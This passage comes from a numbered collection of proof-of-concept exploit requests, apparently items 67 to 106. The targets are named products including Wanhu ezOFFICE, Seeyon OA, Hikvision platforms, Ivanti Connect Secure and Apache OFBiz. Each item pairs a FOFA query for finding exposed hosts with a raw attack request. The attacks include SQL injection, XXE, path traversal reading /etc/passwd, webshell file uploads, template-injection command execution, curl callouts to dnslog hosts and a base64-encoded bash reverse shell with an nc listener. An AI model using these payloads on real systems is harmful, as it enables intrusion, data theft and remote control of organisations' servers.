Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec campus mobile service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE traffic control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata Tianyao software DesignReportSave.jsp interface arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Shifudi LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is as follows; it writes a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Webshell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity MingYu security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php


88. DBAPPSecurity MingYu security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi An Xin Legendsec SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin Legendsec SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast HD Intelligent Recording and Broadcasting System busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The value of SAMLRequest is the base64 encoding of the XML file contents; the XML file is as follows
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


